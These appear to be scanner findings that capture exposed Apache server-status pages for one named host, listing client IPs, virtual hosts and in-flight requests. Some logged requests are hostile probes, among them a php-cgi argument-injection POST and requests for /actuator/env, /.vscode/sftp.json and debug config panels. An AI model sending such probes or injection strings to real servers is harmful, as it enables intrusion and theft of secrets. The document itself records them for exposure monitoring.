162.158.62.232h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-307138620/113/3444_ 7.0210012726930.03.16127.09 104.23.160.219h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-307138620/113/3653_ 7.160022794250.037.53156.40 165.227.39.235http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-307138620/108/3661_ 7.154018263980.01.17162.19 165.227.39.235http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v3/api-docs HTTP/1.1 3-307138620/119/3576_ 7.1511014773800.08.02144.68 165.227.39.235http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/swagger.json HTTP/1.1 3-307138620/122/3518_ 6.973013762870.00.69113.86 165.225.92.153http/1.1cinre.tandemhse.com:443GET /images/app_logo.png HTTP/1.1 4-307138630/3/2977_ 1.478450134282810.00.74130.67 104.23.251.190h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-307138630/1/2889_ 0.9612904518701080.00.0093.96 162.10.161.82http/1.1cinre-backend.tandemhse.com:443GET /items/gmao_equipos/567?fields=id%2Ccodigo_identificacion%2 4-307138630/4/3021_ 2.1985014910703020.00.05116.94 162.158.167.117h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-307138630/6/3027_ 2.608501929673840.00.02152.91 104.23.166.180h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-307138630/2/3106_ 2.231290021415750.00.0078.18 172.70.142.140h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-307138630/2/2932_ 1.7612950161
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb310f155dc80f155dc8e0d26ea9
Apache Status Apache Server Status for www.adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Tuesday, 16-Dec-2025 23:05:56 CET Restart Time: Saturday, 13-Dec-2025 07:04:06 CET Parent Server Config. Generation: 19 Parent Server MPM Generation: 18 Server uptime: 3 days 16 hours 1 minute 49 seconds Server load: 0.07 0.08 0.11 Total accesses: 96982 - Total Traffic: 3.4 GB - Total Duration: 78812431 CPU Usage: u75.5 s49.35 cu502.89 cs316.07 - .298% CPU load .306 requests/sec - 11.3 kB/second - 36.8 kB/request - 812.65 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0355706no0yes010000 1355703no0yes010000 2355838no1yes19001 3355704no0yes010000 4355705no1yes010000 Sum502 149001 _________________________W________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-183557060/19/2302_ 9.9039010976930.00.1675.54 162.158.123.35h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-183557060/28/2242_ 11.0787239811907250.01.4540.03 172.70.100.41h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-183557060/26/2145_ 11.0039016653080.00.6985.88 172.68.135.12h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-183557060/26/2376_ 10.4239013880300.022.7267.70 172.71.8.31h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-183557060/27/2241_ 9.93867114343600.00.3844.54 162.158.123.202h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-183557060/24/2355_ 10.0044020111460.01.0157.74 172.68.92.201h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-183557060/18/2277_ 9.90867016467800.00.1966.16 162.158.123.133h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-183557060/31/2306_ 11.3744011430690.02.0653.21 172.68.92.201h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-183557060/20/2209_ 10.853909845340.01.5383.22 104.23.202.78h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-183557060/28/2258_ 11.3744111282080.00.6773.69 162.158.183.56h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-183557030/26/1774_ 11.493814938600.00.8295.98 103.23.61.80http/1.1barrerasdecontencion.com:443POST /wp-cron.php?doing_wp_cron=1765921235.59488296508789062500 1-183557030/29/1636_ 10.582107770880.03.3641.26 172.68.135.50h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-183557030/26/1625_ 11.648672416435010.00.5786.39 172.68.134.212h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-183557030/28/1665_ 10.363905671840.00.7624.77 104.23.248.194h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-183557030/25/1710_ 11.65443427455620.00.9288.29 172.68.134.212h2tandemsl.com:443idle, streams: 0/4/4/0/0 (open/recv/resp/push/rst) 1-183557030/30/1623_ 11.484022210598990.02.7963.66 172.64.194.4h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-183557030/29/1600_ 12.014308244340.00.3651.12 104.23.221.51h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-183557030/22/1705_ 12.0221012556430.01.7364.64 167.99.210.137http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /api/graphql HTTP/1.1 1-183557030/39/1622_ 10.573804551450.02.1392.22 172.68.134.49h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-183557030/41/1772_ 12.0145010925260.01.3038.44 104.23.221.126h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-183558380/567/2475_ 37.28309315470.026.14166.32 167.99.210.137http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/api-docs HTTP/1.1 2-183558380/571/2560_ 37.302076892820.026.0890.79 167.99.210.137http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 2-183558380/563/2545_ 37.30908904090.012.1890.33 167.99.210.137http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 2-183558380/577/2532_ 37.304010803680.019.5183.97 167.99.210.137http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 2-183558380/563/2552_ 37.261011804910.015.9098.73 104.23.217.131h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-183558380/587/2589W 37.24009853580.021.1667.94 167.99.210.137http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 2-183558380/562/2584_ 37.303010390280.036.00122.77 167.99.210.137http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 2-183558380/540/2595_ 37.266013225640.011.2087.00 104.23.223.87h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-183558380/576/2496_ 37.301011296880.040.21107.77 167.99.210.137http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 2-183558380/561/2681_ 37.292011300300.011.2063.68 167.99.210.137http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api-docs/swagger.json HTTP/1.1 3-183557040/24/1863_ 11.754416096560.00.4262.88 172.68.92.180h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-183557040/14/1822_ 10.2339011623830.01.2990.63 182.44.10.67http/1.1barrerasdecontencion.com:80done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-183557040/24/1721_ 11.231072178574200.00.3479.04 104.23.202.128h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-183557040/18/1741_ 10.95107227552200.00.2462.92 104.22.23.42h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-183557040/16/1947_ 11.3939014476970.01.1154.63 104.22.7.116h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-183557040/19/1724_ 11.754406246690.00.3350.90 104.23.221.44h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-183557040/18/1873_ 9.0339013611740.01.0268.00 172.71.86.141http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-183557040/22/1955_ 10.9610773489785870.00.3956.03 172.69.138.95h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-183557040/16/1867_ 10.634416934040.00.6358.63 172.68.22.178h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-183557040/17/1772_ 11.033906659570.01.1249.32 104.22.23.22h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-183557050/498/1287_ 34.2493129612420.030.9791.46 162.158.182.38h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-183557050/505/1280_ 34.28905977610.019.4255.19 167.99.210.137http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger.json HTTP/1.1 4-183557050/579/1378_ 34.29404264250.021.5975.89 167.99.210.137http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/swagger.json HTTP/1.1 4-183557050/510/1400_ 34.298023217330.039.2092.42 167.99.210.137http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 4-183557050/526/1430_ 34.306015985940.014.3933.42 167.99.210.137http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 4-183557050/479/1254
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb310f155dc80f155dc8e45817fc
Apache Status Apache Server Status for www.adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Thursday, 11-Dec-2025 04:42:07 CET Restart Time: Friday, 05-Dec-2025 09:04:50 CET Parent Server Config. Generation: 33 Parent Server MPM Generation: 32 Server uptime: 5 days 19 hours 37 minutes 16 seconds Server load: 0.02 0.13 0.32 Total accesses: 199953 - Total Traffic: 5.3 GB - Total Duration: 218984767 CPU Usage: u89.2 s63.02 cu985.65 cs508.76 - .328% CPU load .398 requests/sec - 11.1 kB/second - 28.0 kB/request - 1095.18 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03968783no1yes010000 13968648no0yes010000 23968649no0yes19000 33968647no0yes010000 43968650no0yes010000 Sum501 149000 ____________________W_____________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-3239687830/525/3259_ 37.508030457820.011.7776.86 207.154.212.47http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 0-3239687830/505/3097_ 37.31731831383020.022.33123.13 104.23.160.107h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3239687830/526/3155_ 37.47161524518560.011.6357.99 195.76.176.6h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3239687830/505/3125_ 37.512021423030.026.19140.38 207.154.212.47http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 0-3239687830/496/3230_ 37.40121625453710.013.7066.70 162.158.123.135h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3239687830/513/3327_ 37.5012024132930.011.6075.14 207.154.212.47http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v3/api-docs HTTP/1.1 0-3239687830/468/3111_ 37.491037368050.08.0071.34 207.154.212.47http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3239687830/532/3196_ 37.4712723676210.011.42101.73 172.68.135.35h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3239687830/522/3119_ 37.5016022574440.010.4288.89 207.154.212.47http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger.json HTTP/1.1 0-3239687830/525/3210_ 37.514034647600.013.5174.06 207.154.212.47http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 1-3239686480/26/5587_ 15.04976118259484460.011.02154.41 172.71.191.16h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3239686480/27/5567_ 14.979760114222120.00.52148.75 172.70.39.198h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3239686480/30/5660_ 15.0497669472370590.00.49159.69 172.71.191.16h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3239686480/22/5512_ 15.0497688257467590.02.13149.28 104.23.211.82h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3239686480/22/5681_ 15.0097683466251430.01.23155.73 104.23.211.82h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3239686480/27/5647_ 14.97976070747210.00.57163.68 172.71.222.57h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3239686480/31/5766_ 14.97976068394000.07.21162.01 172.68.138.162h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3239686480/23/5643_ 14.97976083778510.01.52138.99 172.70.175.154h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3239686480/18/5572_ 15.05981133645775800.00.50142.03 172.70.175.107h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3239686480/27/5784_ 15.02976160948059020.00.92126.66 172.71.191.16h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3239686490/573/3954W 43.300037948760.013.1593.78 207.154.212.47http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 2-3239686490/648/4053_ 43.272031390670.025.79122.86 212.104.141.68http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 2-3239686490/607/3993_ 43.346030789300.012.42147.80 207.154.212.47http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 2-3239686490/590/3947_ 43.23349529090960.011.5677.81 172.69.70.84h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3239686490/624/3966_ 43.347044971120.013.7492.70 207.154.212.47http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 2-3239686490/627/3969_ 43.339029635820.012.30111.27 207.154.212.47http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 2-3239686490/622/3950_ 43.326029270570.016.04130.74 207.154.212.47http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/api-docs HTTP/1.1 2-3239686490/613/3888_ 43.340029654420.019.0888.50 207.154.212.47http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 2-3239686490/644/4020_ 43.342028604600.025.64123.34 207.154.212.47http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 2-3239686490/613/3846_ 43.334029379350.016.1081.38 207.154.212.47http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api-docs/swagger.json HTTP/1.1 3-3239686470/44/2055_ 15.40976019742460.02.2885.36 172.70.35.153h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3239686470/49/2120_ 15.4998179579597350.00.8680.26 172.71.194.24h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3239686470/51/2073_ 15.47100183919850170.00.7463.29 172.70.134.212h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3239686470/41/2107_ 15.391005020182660.00.8842.05 104.23.209.189h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3239686470/49/2040_ 15.4699686119608280.01.38115.64 172.70.175.107h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 3-3239686470/46/1989_ 15.45996160718818390.00.6399.06 172.71.194.24h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3239686470/47/2048_ 15.401005020054730.00.4984.54 172.71.191.112h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 3-3239686470/40/1971_ 15.14100546218540800.00.5878.95 104.23.175.17h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3239686470/38/2113_ 15.431005181018922540.00.3953.64 172.70.134.213h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3239686470/47/2003_ 15.40976018100630.00.6064.56 104.23.211.203h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3239686500/22/5071_ 14.161005047612780.00.26112.99 162.158.152.201h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3239686500/24/5127_ 14.14996048750980.00.56106.25 172.70.174.194h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3239686500/35/5282_ 14.20996171069503580.00.54116.89 172.70.134.212h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3239686500/25/5172_ 14.221001138184053470.00.77155.63 172.71.191.15h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3239686500/28/5190_ 14.14996043690010.00.59119.25 104.23.209.186h2tandemsl.com:4
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb310f155dc80f155dc81c0bea0b
Apache Status Apache Server Status for www.adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Monday, 01-Dec-2025 08:37:19 CET Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 423 Parent Server MPM Generation: 422 Server uptime: 79 days 20 hours 16 minutes 17 seconds Server load: 0.41 0.33 0.23 Total accesses: 2478385 - Total Traffic: 76.1 GB - Total Duration: 1590469315 CPU Usage: u254.93 s301.45 cu13768.3 cs7908.29 - .322% CPU load .359 requests/sec - 11.6 kB/second - 32.2 kB/request - 641.736 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01573631no0yes010000 11573632no0yes010000 21573765no2yes010001 31573630no2yes19000 41573633no0yes010000 Sum504 149001 ________________________________W_________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-42215736310/142/45548_ 27.975836340347530.02.401681.65 46.24.53.33h2done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-42215736310/144/44931_ 28.035880495266550.02.941441.88 172.70.108.89h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-42215736310/139/45501_ 28.025424227874400.03.471457.27 172.70.108.105h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-42215736310/148/45131_ 28.035830222202410.03.291493.85 46.24.53.33h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-42215736310/153/45839_ 27.44542268215263760.03.301535.48 212.170.119.244h2done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-42215736310/124/45344_ 28.165880215143530.02.741541.36 172.68.7.30h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-42215736310/126/45521_ 27.975882297919020.05.061442.38 172.68.23.90h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-42215736310/150/44877_ 28.165880224520760.01.981532.79 172.70.83.134h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-42215736310/138/45670_ 28.015832219869360.02.121417.14 46.24.53.33h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-42215736310/138/45457_ 28.1854714329598200.03.461647.17 212.170.119.244h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-42215736320/384/50758_ 36.292501119231850400.05.881667.78 213.192.214.80h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-42215736320/339/51200_ 36.174021270017380.06.021656.37 172.70.108.183h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-42215736320/358/50848_ 36.4125524287905260.07.161568.05 104.22.23.62h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-42215736320/353/50775_ 35.84397172729388830.06.311544.25 104.23.170.155h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-42215736320/341/51277_ 36.33446509431917600.06.131606.18 45.142.154.17http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-42215736320/337/51978_ 36.173970250226980.04.351570.27 172.70.108.13h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-42215736320/337/51088_ 36.3440225283320110.06.891536.30 46.26.36.66h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-42215736320/325/51715_ 36.164460228740320.08.651556.70 46.24.53.33h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-42215736320/346/49900_ 36.175411360197750.06.661404.75 162.158.23.34h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-42215736320/327/51344_ 36.102504491009120.05.981497.65 172.68.23.231h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-42215737650/336/48476_ 34.2810262390830.06.561442.80 64.227.70.2http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 2-42215737650/345/47703_ 34.2630402377580.07.271373.44 64.227.70.2http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/swagger-ui.html HTTP/1.1 2-42215737650/280/48319_ 34.2910310447240.06.081505.14 64.227.70.2http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 2-42215737650/339/47416_ 34.28217242257160.012.661426.25 79.148.250.12h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-42215737650/348/47758_ 34.28214252100740.09.021587.82 212.170.119.244h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-42215737650/281/48190_ 34.2920249496170.013.511404.61 64.227.70.2http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 2-42215737650/326/47796_ 34.24321226984320.07.241452.96 46.24.53.33h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-42215737650/312/48083_ 34.29143256554730.011.981454.42 2.136.78.3h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-42215737650/289/48010_ 34.2630252356680.06.501626.56 64.227.70.2http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger-ui.html HTTP/1.1 2-42215737650/281/48421_ 34.28219269216120.06.531503.78 46.24.53.33h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-42215736300/372/55731_ 33.5470335817730.08.261714.25 64.227.70.2http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 3-42215736300/411/54378_ 33.5230301550300.012.471524.70 64.227.70.2http/1.1 3-42215736300/399/55654W 33.5400337162260.014.011699.97 64.227.70.2http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 3-42215736300/395/54755_ 33.5430358512790.010.441813.17 64.227.70.2http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 3-42215736300/351/55137_ 33.5370285854750.09.321577.80 64.227.70.2http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/v1/swagger.json HTTP/1.1 3-42215736300/372/55072_ 33.5450272060270.033.691734.46 64.227.70.2http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 3-42215736300/418/55583_ 33.5270306980660.010.271746.10 64.227.70.2http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /graphql/api HTTP/1.1 3-42215736300/349/55291_ 33.5320391225210.025.681751.12 64.227.70.2http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 3-42215736300/341/54439_ 33.5400925529280.09.051656.25 64.227.70.2http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-42215736300/417/55794_ 33.5422410455770.031.541660.24 46.24.53.33h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-42215736330/24/48163_ 20.505880414285320.00.431577.81 162.158.123.228h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-42215736330/23/48364_ 21.184410287499220.00.151585.33 172.68.7.69h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-42215736330/30/48368_ 21.2344627245978640.00.131605.41 87.58.87.84http/1.1relehse.com:443GET /admin/getNotifications HTTP/1.1 4-42215736330/27/48579_ 21.185880266715040.00.271526.24 172.68.12.210h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-42215736330/26/47809_ 21.074410278864910.00.201474.18 172.68.234.156h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/re
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb310f155dc80f155dc80c0ee2b0
Apache Status Apache Server Status for www.adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Saturday, 29-Nov-2025 05:33:18 CET Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 416 Parent Server MPM Generation: 415 Server uptime: 77 days 17 hours 12 minutes 15 seconds Server load: 0.12 0.07 0.06 Total accesses: 2447672 - Total Traffic: 75.1 GB - Total Duration: 1548511110 CPU Usage: u165 s231.16 cu13610.8 cs7783.33 - .325% CPU load .365 requests/sec - 11.7 kB/second - 32.2 kB/request - 632.646 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01429466no1yes010000 11429467no2yes010000 21429468no2yes010000 31429465no4yes010000 41429598no2yes19001 Sum5011 149001 _________________________________________W________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-41514294660/1/45208_ 0.6770338997870.00.061673.47 172.71.146.23h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-41514294660/1/44634_ 0.08120494001870.00.001434.69 134.209.25.199http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 0-41514294660/2/45197_ 0.661411226603250.00.071447.90 172.71.147.171h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-41514294660/0/44768_ 0.009811220716730.00.001482.63 172.71.103.136h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-41514294660/1/45543_ 0.6470212762460.00.581519.56 162.159.120.225h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-41514294660/1/45051_ 0.6281213791280.00.001535.70 108.162.246.109h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-41514294660/3/45235_ 0.68140296635580.00.011434.53 172.71.147.9h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-41514294660/2/44552_ 